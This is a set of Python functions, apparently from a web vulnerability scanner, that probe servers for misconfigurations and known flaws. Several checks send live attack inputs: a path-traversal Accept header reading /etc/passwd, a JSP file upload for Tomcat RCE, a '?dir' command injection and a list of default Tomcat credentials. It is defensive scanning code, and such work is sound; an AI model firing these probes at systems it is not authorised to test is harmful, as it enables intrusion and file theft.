Example #1
def check_http_methods(
        url: str,
        path: Optional[str] = None) -> Tuple[List[str], List[Result]]:
    results: List[Result] = []
    supported_methods: List[str] = []

    # before we start, we should test an invalid verb, to see if it will accept anything
    res = network.http_custom("XINVALIDX", url)
    results += response_scanner.check_response(url, res)

    if res.status_code < 405:
        # no point in continuing, it'll return as if everything is supported, which is just noise
        return supported_methods, results

    if path is None:
        file_path = pkg_resources.resource_filename(
            "yawast", "resources/http-protocol-methods.txt")
    else:
        file_path = path

    with open(file_path) as file:
        for line in file:
            # strip the newline so the raw verb is sent, not "VERB\n"
            verb = line.strip()

            res = network.http_custom(verb, url)

            if res.status_code < 405:
                supported_methods.append(verb)

            results += response_scanner.check_response(url, res)

    return supported_methods, results
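
A minimal usage sketch (the target URL is hypothetical; the bare network.init("", "", "") call mirrors the test in Example #10):

network.init("", "", "")
methods, findings = check_http_methods("https://example.com/")
print(f"Supported verbs: {methods}")  # every verb that returned a status below 405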
Example #2
def check_cve_2019_5418(url: str) -> List[Result]:
    global _checked

    # this only applies to controllers, so skip the check unless the link ends with '/'
    if not url.endswith("/") or url in _checked:
        return []

    results: List[Result] = []
    _checked.append(url)

    try:
        res = network.http_get(
            url, False, {"Accept": "../../../../../../../../../etc/passwd{{"}
        )
        body = res.text
        req = network.http_build_raw_request(res.request)

        results += response_scanner.check_response(url, res)

        # look for the root entry of /etc/passwd anywhere in the response body;
        # MULTILINE lets $ match at each line end, since root's line is rarely last
        pattern = r"root:[a-zA-Z0-9]+:0:0:.+$"
        mtch = re.search(pattern, body, re.MULTILINE)

        if mtch:
            results.append(
                Result(
                    f"Rails CVE-2019-5418: File Content Disclosure: {url} - {mtch.group(0)}",
                    Vulnerabilities.SERVER_RAILS_CVE_2019_5418,
                    url,
                    [body, req],
                )
            )
    except Exception:
        output.debug_exception()

    return results
Example #3
def check_options(url: str) -> List[Result]:
    results: List[Result] = []

    res = network.http_options(url)

    if "Allow" in res.headers:
        results.append(
            Result.from_evidence(
                Evidence.from_response(res),
                f"Allow HTTP Verbs (OPTIONS): {res.headers['Allow']}",
                Vln.HTTP_OPTIONS_ALLOW,
            )
        )

    if "Public" in res.headers:
        results.append(
            Result.from_evidence(
                Evidence.from_response(res),
                f"Public HTTP Verbs (OPTIONS): {res.headers['Public']}",
                Vln.HTTP_OPTIONS_PUBLIC,
            )
        )

    results += response_scanner.check_response(url, res)

    return results
Example #4
def check_asp_net_debug(url: str) -> List[Result]:
    results: List[Result] = []

    res = network.http_custom(
        "DEBUG", url, additional_headers={"Command": "stop-debug", "Accept": "*/*"}
    )

    if res.status_code == 200 and "OK" in res.text:
        # we've got a hit, but could be a false positive
        # try this again, with a different verb
        xres = network.http_custom(
            "XDEBUG", url, additional_headers={"Command": "stop-debug", "Accept": "*/*"}
        )

        # if we get a 200 when using an invalid verb, it's a false positive
        # if we get something else, then the DEBUG actually did something
        if xres.status_code != 200:
            results.append(
                Result(
                    "ASP.NET Debugging Enabled",
                    Vulnerabilities.SERVER_ASPNET_DEBUG_ENABLED,
                    url,
                    [
                        network.http_build_raw_request(res.request),
                        network.http_build_raw_response(res),
                    ],
                )
            )
        else:
            output.debug("Server responds to invalid HTTP verbs with status 200")

    results += response_scanner.check_response(url, res)

    return results
Example #5
def check_options(url: str) -> List[Result]:
    results: List[Result] = []

    res = network.http_options(url)

    if "Allow" in res.headers:
        results.append(
            Result(
                f"Allow HTTP Verbs (OPTIONS): {res.headers['Allow']}",
                Vulnerabilities.HTTP_OPTIONS_ALLOW,
                url,
                [
                    network.http_build_raw_request(res.request),
                    network.http_build_raw_response(res),
                ],
            )
        )

    if "Public" in res.headers:
        results.append(
            Result(
                f"Public HTTP Verbs (OPTIONS): {res.headers['Public']}",
                Vulnerabilities.HTTP_OPTIONS_PUBLIC,
                url,
                [
                    network.http_build_raw_request(res.request),
                    network.http_build_raw_response(res),
                ],
            )
        )

    results += response_scanner.check_response(url, res)

    return results
Example #6
def check_status(url: str) -> List[Result]:
    results: List[Result] = []
    search = ["status/", "stats/"]

    for path in search:
        target = urljoin(url, path)

        res = network.http_get(target, False)
        body = res.text

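        # nginx's stub_status page starts with an "Active connections:" line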
        if res.status_code == 200 and "Active connections:" in body:
            results.append(
                Result(
                    f"Nginx status page found: {target}",
                    Vulnerabilities.SERVER_NGINX_STATUS_EXPOSED,
                    target,
                    [
                        network.http_build_raw_request(res.request),
                        network.http_build_raw_response(res),
                    ],
                ))

        results += response_scanner.check_response(target, res)

    return results
Example #7
def check_path_disclosure(wp_url: str) -> List[Result]:
    # this is a list of files that are known to throw a fatal error when accessed directly
    # this is from a manual review of all plugins with at least 1M installs
    urls = [
        "wp-content/plugins/hello.php",
        "wp-content/plugins/akismet/akismet.php",
        "wp-content/plugins/contact-form-7/includes/capabilities.php",
        "wp-content/plugins/wordpress-seo/admin/views/partial-alerts-errors.php",
        "wp-content/plugins/jetpack/load-jetpack.php",
        "wp-content/plugins/jetpack/uninstall.php",
        "wp-content/plugins/duplicate-post/duplicate-post-admin.php",
        "wp-content/plugins/wpforms-lite/includes/admin/class-welcome.php",
        "wp-content/plugins/wp-google-maps/base/includes/welcome.php",
        "wp-content/plugins/wp-super-cache/wp-cache.php",
        "wp-content/plugins/mailchimp-for-wp/integrations/wpforms/bootstrap.php",
        "wp-content/plugins/mailchimp-for-wp/integrations/bootstrap.php",
        "wp-content/plugins/regenerate-thumbnails/regenerate-thumbnails.php",
        "wp-content/plugins/advanced-custom-fields/includes/deprecated.php",
        "wp-content/plugins/redirection/redirection.php",
        "wp-content/plugins/wpforms-lite/includes/admin/importers/class-ninja-forms.php",
        "wp-content/plugins/ninja-forms/includes/deprecated.php",
        "wp-content/plugins/so-widgets-bundle/so-widgets-bundle.php",
        "wp-content/plugins/wp-fastest-cache/templates/preload.php",
        "wp-content/plugins/duplicate-page/duplicatepage.php",
        "wp-content/plugins/better-wp-security/better-wp-security.php",
        "wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-unlock-request.php",
        "wp-content/plugins/related-posts/views/settings.php",
        "wp-content/plugins/wpcontentguard/views/settings.php",
        "wp-content/plugins/simple-social-icons/simple-social-icons.php",
    ]
    results: List[Result] = []

    for url in urls:
        target = urljoin(wp_url, url)

        head = network.http_head(target, False)
        if head.status_code != 404:
            resp = network.http_get(target, False)
            if resp.status_code < 300 or resp.status_code >= 500:
                # we have some kind of response that could be useful
                if "<b>Fatal error</b>:" in resp.text:
                    # we have an error
                    # capture an absolute *nix or Windows path ending in .php
                    pattern = r"<b>((\/|[A-Z]:\\).*?\.php)<\/b>"
                    if re.search(pattern, resp.text):
                        try:
                            path = re.findall(pattern, resp.text)[0][0]
                            results.append(
                                Result.from_evidence(
                                    Evidence.from_response(resp, {"path": path}),
                                    f"WordPress File Path Disclosure: {target} ({path})",
                                    Vulnerabilities.APP_WORDPRESS_PATH_DISCLOSURE,
                                ))
                        except Exception:
                            output.debug_exception()

            results += response_scanner.check_response(target, resp)

    return results
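
To see what the path-disclosure pattern extracts, here is a self-contained sketch; the fatal-error HTML is invented for illustration:

import re

sample = ("<b>Fatal error</b>:  Uncaught Error in "
          "<b>/var/www/html/wp-content/plugins/hello.php</b> on line 10")
pattern = r"<b>((\/|[A-Z]:\\).*?\.php)<\/b>"
print(re.findall(pattern, sample)[0][0])  # /var/www/html/wp-content/plugins/hello.php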
Example #8
def _check_url(urls: List[str], queue, follow_redirections, recursive) -> None:
    files: List[str] = []
    results: List[Result] = []

    for url in urls:
        try:
            # get the HEAD first, we only really care about actual files
            res = network.http_head(url, False)

            if res.status_code < 300:
                # run a scan on the full result, so we can ensure that we get any issues
                results += response_scanner.check_response(
                    url, network.http_get(url, False))

                files.append(url)

                if recursive:
                    found_files, found_results = find_directories(
                        url, follow_redirections, recursive
                    )

                    files.extend(found_files)
                    results.extend(found_results)
            elif res.status_code < 400 and follow_redirections:
                if "Location" in res.headers:
                    _check_url([res.headers["Location"]], queue,
                               follow_redirections, recursive)
        except Exception as error:
            output.debug(f"Error checking URL ({url}): {str(error)}")

    queue.put((files, results))
Example #9
def check_cve_2019_0232(links: List[str]) -> List[Result]:
    results: List[Result] = []
    targets: List[str] = []

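    # CVE-2019-0232: on Windows, Tomcat's CGI servlet (with enableCmdLineArguments)
    # can pass the query string to the command line, so "?dir" runs the "dir" command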
    for link in links:
        if "cgi-bin" in link:
            if "?" in link:
                targets.append(f"{link}&dir")
            else:
                targets.append(f"{link}?dir")

    for target in targets:
        res = network.http_get(target, False)
        body = res.text

        if "<DIR>" in body:
            # we have a hit
            results.append(
                Result(
                    f"Apache Tomcat RCE (CVE-2019-0232): {target}",
                    Vulnerabilities.SERVER_TOMCAT_CVE_2019_0232,
                    target,
                    [
                        network.http_build_raw_request(res.request),
                        network.http_build_raw_response(res),
                    ],
                ))

        results += response_scanner.check_response(target, res)

    return results
Example #10
    def test_response_scanner(self):
        network.init("", "", "")
        url = "https://adamcaudill.com/"
        resp = network.http_get(url)

        http.reset()
        res = response_scanner.check_response(url, resp)

        self.assertTrue(any("External JavaScript File" in r.message for r in res))
        self.assertTrue(any("Vulnerable JavaScript" in r.message for r in res))
Example #11
def check_cve_2017_12615(url: str) -> List[Result]:
    results = []

    try:
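        # random file name and marker value so existing content can't cause a false hit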
        file_name = secrets.token_hex(12)
        check_value = secrets.token_hex(12)

        target = urljoin(url, f"{file_name}.jsp/")
        # quote the marker so the JSP compiles and prints it when executed
        res_put = network.http_put(
            target, f'<% out.println("{check_value}");%>', False
        )

        if res_put.status_code < 300:
            # code should be 2xx for this to work
            # now we need to check to see if it worked
            created_file = urljoin(url, f"{file_name}.jsp")

            res_get = network.http_get(created_file, False)

            if check_value in res_get.text:
                # we have RCE
                results.append(
                    Result(
                        f"Apache Tomcat PUT RCE (CVE-2017-12615): {created_file}",
                        Vulnerabilities.SERVER_TOMCAT_CVE_2017_12615,
                        url,
                        [
                            network.http_build_raw_request(res_put.request),
                            network.http_build_raw_response(res_put),
                            network.http_build_raw_request(res_get.request),
                            network.http_build_raw_response(res_get),
                        ],
                    ))
            else:
                results += response_scanner.check_response(
                    created_file, res_get)
        else:
            # if we didn't get a hit, go ahead and scan it to see if there's
            #  anything else that we should be picking up.
            results += response_scanner.check_response(target, res_put)
    except Exception:
        output.debug_exception()

    return results
Example #12
def check_for_jira(session: Session) -> Tuple[List[Result], Union[str, None]]:
    # this checks for an instance of Jira relative to the session URL
    results: List[Result] = []
    jira_url = None

    try:
        targets = [
            f"{session.url}secure/Dashboard.jspa",
            f"{session.url}jira/secure/Dashboard.jspa",
        ]

        for target in targets:
            res = network.http_get(target, False)

            if (
                res.status_code == 200
                and 'name="application-name" content="JIRA"' in res.text
            ):
                # we have a Jira instance
                jira_url = target

                # try to get the version
                ver_str = "unknown"
                try:
                    ver_pattern = (
                        r"<meta name=\"ajs-version-number\" content=\"([\d\.]+)\">"
                    )
                    version = re.search(ver_pattern, res.text).group(1)

                    build_pattern = (
                        r"<meta name=\"ajs-build-number\" content=\"(\d+)\">"
                    )
                    build = re.search(build_pattern, res.text).group(1)

                    ver_str = f"v{version}-{build}"
                except Exception:
                    output.debug_exception()

                results.append(
                    Result.from_evidence(
                        Evidence.from_response(res),
                        f"Jira Installation Found ({ver_str}): {target}",
                        Vulnerabilities.APP_JIRA_FOUND,
                    )
                )

            results += response_scanner.check_response(target, res)

            if jira_url is not None:
                # one hit is enough; skip the remaining candidate path
                break
    except Exception:
        output.debug_exception()

    return results, jira_url
Example #13
    def _process(url: str, res: Response):
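        # nested helper: `results`, `new_links`, and `target` are captured from
        # the enclosing backup-file search function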
        nonlocal results, new_links

        if res.status_code == 200:
            # we found something!
            new_links.append(url)

            results.append(
                Result.from_evidence(
                    Evidence.from_response(res),
                    f"Found backup file: {url}",
                    Vulnerabilities.HTTP_BACKUP_FILE,
                ))

        results += response_scanner.check_response(target, res)
Example #14
def check_trace(url: str) -> List[Result]:
    results: List[Result] = []

    res = network.http_custom("TRACE", url)
    body = res.text

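    # a 200 that echoes our request line back means TRACE is enabled; TRACE
    # responses can expose request headers (cross-site tracing)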
    if res.status_code == 200 and "TRACE / HTTP/1.1" in body:
        results.append(
            Result.from_evidence(
                Evidence.from_response(res),
                "HTTP TRACE Enabled",
                Vln.HTTP_TRACE_ENABLED,
            ))

    results += response_scanner.check_response(url, res)

    return results
Example #15
def check_propfind(url: str) -> List[Result]:
    results: List[Result] = []

    res = network.http_custom("PROPFIND", url)
    body = res.text

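    # PROPFIND is a WebDAV method; an XML reply suggests WebDAV is enabled
    # and may disclose file and directory metadata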
    if res.status_code <= 400 and len(body) > 0:
        if "Content-Type" in res.headers and "text/xml" in res.headers["Content-Type"]:
            results.append(
                Result.from_evidence(
                    Evidence.from_response(res),
                    "Possible Info Disclosure: PROPFIND Enabled",
                    Vln.HTTP_PROPFIND_ENABLED,
                )
            )

    results += response_scanner.check_response(url, res)

    return results
Example #16
def check_struts_sample(url: str) -> List[Result]:
    results: List[Result] = []

    try:
        # make sure we have real 404s
        file_good, _, _, _ = network.check_404_response(url)
        if not file_good:
            return results

        search = [
            "Struts2XMLHelloWorld/User/home.action",
            "struts2-showcase/showcase.action",
            "struts2-showcase/titles/index.action",
            "struts2-bootstrap-showcase/",
            "struts2-showcase/index.action",
            "struts2-bootstrap-showcase/index.action",
            "struts2-rest-showcase/",
        ]

        for path in search:
            target = urljoin(url, path)

            res = network.http_get(target, False)

            # check for other issues
            results += response_scanner.check_response(target, res)

            if res.status_code == 200:
                results.append(
                    Result(
                        f"Struts Sample Found: {target}",
                        Vulnerabilities.SERVER_TOMCAT_STRUTS_SAMPLE,
                        target,
                        [
                            network.http_build_raw_request(res.request),
                            network.http_build_raw_response(res),
                        ],
                    )
                )
    except Exception:
        output.debug_exception()

    return results
Example #17
def check_manager_password(url: str) -> List[Result]:
    results = []

    try:
        creds = [
            b"tomcat:tomcat",
            b"tomcat:password",
            b"tomcat:",
            b"admin:admin",
            b"admin:password",
            b"admin:",
        ]

        for cred in creds:
            ce = base64.b64encode(cred)

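            # HTTP Basic auth: base64 of "user:password", sent with the "Basic " scheme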
            res = network.http_get(url, False, {"Authorization": f"Basic {ce.decode()}"})
            body = res.text

            if (
                '<font size="+2">Tomcat Web Application Manager</font>' in body
                or '<font size="+2">Tomcat Virtual Host Manager</font>' in body
            ):
                # we got in
                results.append(
                    Result(
                        f"Apache Tomcat Weak Manager Password: '{cred.decode()}' - {url}",
                        Vulnerabilities.SERVER_TOMCAT_MANAGER_WEAK_PASSWORD,
                        url,
                        [
                            network.http_build_raw_request(res.request),
                            network.http_build_raw_response(res),
                        ],
                    )
                )
            else:
                # if we didn't get a hit, go ahead and scan it to see if there's
                #  anything else that we should be picking up.
                results += response_scanner.check_response(url, res)
    except Exception:
        output.debug_exception()

    return results
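
For reference, the header value produced for the first credential pair (standalone sketch):

import base64

ce = base64.b64encode(b"tomcat:tomcat")
print(f"Basic {ce.decode()}")  # Basic dG9tY2F0OnRvbWNhdA==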
Example #18
def check_jira_user_registration(jira_url: str) -> List[Result]:
    results: List[Result] = []

    try:
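        # swap the last path segment (e.g. Dashboard.jspa) for the signup action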
        target = f"{jira_url.rsplit('/', 1)[0]}/Signup!default.jspa"
        res = network.http_get(target, False)

        if res.status_code == 200 and "<title>Sign up for Jira" in res.text:
            results.append(
                Result.from_evidence(
                    Evidence.from_response(res),
                    f"Jira User Registration Enabled: {target}",
                    Vulnerabilities.APP_JIRA_USER_REG_ENABLED,
                ))

        results += response_scanner.check_response(target, res)
    except Exception:
        output.debug_exception()

    return results
Example #19
def check_server_status(url: str) -> List[Result]:
    results = []

    target = urljoin(url, "server-status/")

    res = network.http_get(target, False)
    body = res.text

    if "Apache Server Status" in body:
        results.append(
            Result(
                f"Apache HTTPD Server Status found: {target}",
                Vulnerabilities.SERVER_APACHE_STATUS,
                target,
                body,
            ))

    results += response_scanner.check_response(target, res)

    return results
Example #20
def _check_url(url: str, targets: List[str]) -> Tuple[List[str], List[Result]]:
    files: List[str] = []
    results: List[Result] = []

    for target in targets:
        target_url = urljoin(url, target)

        res = network.http_get(target_url, False)

        results += response_scanner.check_response(target_url, res)

        if res.status_code < 300:
            files.append(target_url)
            results.append(
                Result.from_evidence(
                    Evidence.from_response(res),
                    f"File found: {target_url}",
                    Vulnerabilities.SERVER_SPECIAL_FILE_EXPOSED,
                ))

    return files, results
Example #21
def check_manager(url: str) -> List[Result]:
    results = []

    try:
        for p in [urljoin(url, "manager/"), urljoin(url, "host-manager/")]:
            # check for both Tomcat 6, and 7+
            for path in [urljoin(p, "html/"), p]:

                res = network.http_get(path, False)

                body = res.text

                if "<tt>conf/tomcat-users.xml</tt>" in body:
                    # we have a finding
                    vuln = Vulnerabilities.SERVER_TOMCAT_MANAGER_EXPOSED
                    if "host-manager" in path:
                        vuln = Vulnerabilities.SERVER_TOMCAT_HOST_MANAGER_EXPOSED

                    results.append(
                        Result(
                            f"Apache Tomcat Manager found: {path}",
                            vuln,
                            path,
                            [
                                network.http_build_raw_request(res.request),
                                network.http_build_raw_response(res),
                            ],
                        )
                    )

                    # check to see if we can get in with a default password
                    results += check_manager_password(url)
                else:
                    # if we didn't get a hit, go ahead and scan it to see if there's
                    #  anything else that we should be picking up.
                    results += response_scanner.check_response(path, res)
    except Exception:
        output.debug_exception()

    return results
Example #22
def check_trace(url: str) -> List[Result]:
    results: List[Result] = []

    res = network.http_custom("TRACE", url)
    body = res.text

    if res.status_code == 200 and "TRACE / HTTP/1.1" in body:
        results.append(
            Result(
                "HTTP TRACE Enabled",
                Vulnerabilities.HTTP_TRACE_ENABLED,
                url,
                [
                    network.http_build_raw_request(res.request),
                    network.http_build_raw_response(res),
                ],
            )
        )

    results += response_scanner.check_response(url, res)

    return results
Example #23
def check_propfind(url: str) -> List[Result]:
    results: List[Result] = []

    res = network.http_custom("PROPFIND", url)
    body = res.text

    if res.status_code <= 400 and len(body) > 0:
        if "Content-Type" in res.headers and "text/xml" in res.headers["Content-Type"]:
            results.append(
                Result(
                    "Possible Info Disclosure: PROPFIND Enabled",
                    Vulnerabilities.HTTP_PROPFIND_ENABLED,
                    url,
                    [
                        network.http_build_raw_request(res.request),
                        network.http_build_raw_response(res),
                    ],
                )
            )

    results += response_scanner.check_response(url, res)

    return results
Example #24
def check_cve_2019_5418(url: str) -> List[Result]:
    # this only applies to controllers, so skip the check unless the link ends with '/'
    if not url.endswith("/"):
        return []

    results: List[Result] = []

    res = network.http_get(
        url, False, {"Accept": "../../../../../../../../../etc/passwd{{"})
    body = res.text
    req = network.http_build_raw_request(res.request)

    results += response_scanner.check_response(url, res)

    if "root:" in body:
        results.append(
            Result(
                f"Rails CVE-2019-5418: File Content Disclosure: {url}",
                Vulnerabilities.SERVER_RAILS_CVE_2019_5418,
                url,
                [body, req],
            ))

    return results
Example #25
def _file_search(session: Session, orig_links: List[str]) -> List[str]:
    new_files: List[str] = []
    file_good, file_res, path_good, path_res = network.check_404_response(session.url)

    # these are here for data typing
    results: Union[List[Result], None]
    links: Union[List[str], None]

    # check the 404 responses for any issues
    results = response_scanner.check_response(file_res.url, file_res)
    results += response_scanner.check_response(path_res.url, path_res)
    if results:
        reporter.display_results(results, "\t")

    if not file_good:
        reporter.display(
            "Web server does not respond properly to file 404 errors.",
            Issue(
                Vulnerabilities.SERVER_INVALID_404_FILE,
                session.url,
                Evidence.from_response(file_res),
            ),
        )
    if not path_good:
        reporter.display(
            "Web server does not respond properly to path 404 errors.",
            Issue(
                Vulnerabilities.SERVER_INVALID_404_PATH,
                session.url,
                Evidence.from_response(path_res),
            ),
        )

    if not (file_good or path_good):
        output.norm(
            "Site does not respond properly to non-existent file/path requests; search may take longer."
        )

    links, results = special_files.check_special_files(session.url)
    if results:
        reporter.display_results(results, "\t")

    new_files += links

    if session.args.files:
        output.empty()
        output.norm("Searching for common files (this will take a few minutes)...")

        with Spinner():
            try:
                links, results = file_search.find_files(session.url)
            except Exception as error:
                output.debug_exception()
                output.error(f"Error running scan: {str(error)}")
                results = None
                links = None

        if results is not None and results:
            reporter.display_results(results, "\t")

        if links is not None and links:
            new_files += links

            for l in links:
                if l not in orig_links:
                    output.norm(f"\tNew file found: {l}")

            output.empty()

    # check for common backup files
    all_links = orig_links + new_files
    with Spinner():
        backups, res = file_search.find_backups(all_links)
    if res:
        reporter.display_results(res, "\t")
    if backups:
        new_files += backups

    if path_good:
        links, results = special_files.check_special_paths(session.url)

        if results:
            reporter.display_results(results, "\t")

        new_files += links

        if session.args.dir:
            output.empty()
            output.norm(
                "Searching for common directories (this will take a few minutes)..."
            )

            with Spinner():
                try:
                    links, results = file_search.find_directories(
                        session.url,
                        session.args.dirlistredir,
                        session.args.dirrecursive,
                    )
                except Exception as error:
                    output.debug_exception()
                    output.error(f"Error running scan: {str(error)}")
                    results = None
                    links = None

            if results is not None and results:
                reporter.display_results(results, "\t")

            if links is not None and links:
                new_files += links

                for l in links:
                    if l not in orig_links:
                        output.norm(f"\tNew directory found: {l}")

                output.empty()

    # check for .DS_Store files
    res = file_search.find_ds_store(new_files)

    if res:
        reporter.display_results(res, "\t")

    return new_files
Example #26
def _get_links(base_url: str, urls: List[str], queue, pool):
    global _links, _insecure, _tasks, _lock

    max_length = 1024 * 1024 * 3  # 3MB

    results: List[Result] = []

    # fail-safe to make sure we don't go too crazy
    if len(_links) > 10000:
        # if we have more than 10,000 URLs in our list, just stop
        output.debug(
            "Spider: Link list contains > 10,000 items. Stopped gathering more links."
        )

        return

    for url in urls:
        try:
            # list of pages found that will need to be processed
            to_process: List[str] = []

            res = network.http_get(url, False)

            # get the length, so that we don't parse huge documents
            if "Content-Length" in res.headers:
                length = int(res.headers["Content-Length"])
            else:
                length = len(res.content)

            if http_utils.is_text(res) and length < max_length:
                soup = BeautifulSoup(res.text, "html.parser")
            else:
                # no clue what this is
                soup = None

            results += response_scanner.check_response(url, res, soup)

            if soup is not None:
                for link in soup.find_all("a"):
                    href = link.get("href")

                    if str(href).startswith("/") and not str(href).startswith("//"):
                        href = urljoin(base_url, href)

                    if href is not None:
                        # check to see if this link is in scope
                        if base_url in href and href not in _links:
                            if "." in href.split("/")[-1]:
                                file_ext = href.split("/")[-1].split(".")[-1]
                            else:
                                file_ext = None

                            with _lock:
                                _links.append(href)

                            # filter out some of the obvious binary files
                            if file_ext is None or file_ext not in [
                                    "gzip",
                                    "jpg",
                                    "jpeg",
                                    "gif",
                                    "woff",
                                    "zip",
                                    "exe",
                                    "gz",
                                    "pdf",
                            ]:
                                if not _is_unsafe_link(href, link.string):
                                    to_process.append(href)
                                else:
                                    output.debug(
                                        f"Skipping unsafe URL: {link.string} - {href}"
                                    )
                            else:
                                output.debug(
                                    f'Skipping URL "{href}" due to file extension "{file_ext}"'
                                )
                        else:
                            if (base_url.startswith("https://")
                                    and str(href).startswith("http://")
                                    and str(href) not in _insecure):
                                # link from secure to insecure
                                with _lock:
                                    _insecure.append(str(href))

                                results.append(
                                    Result.from_evidence(
                                        Evidence.from_response(
                                            res, {"link": href}),
                                        f"Insecure Link: {url} links to {href}",
                                        Vulnerabilities.HTTP_INSECURE_LINK,
                                    ))

            # handle redirects
            if "Location" in res.headers:
                redirect = res.headers["Location"]

                # check for relative link
                if str(redirect).startswith("/"):
                    redirect = urljoin(base_url, redirect)

                # make sure that we aren't redirected out of scope
                if base_url in redirect:
                    to_process.append(redirect)

            if len(to_process) > 0:
                asy = pool.apply_async(_get_links,
                                       (base_url, to_process, queue, pool))

                with _lock:
                    _tasks.append(asy)
        except Exception:
            output.debug_exception()

    output.debug(f"GetLinks Task Completed - {len(results)} issues found.")
    queue.put(results)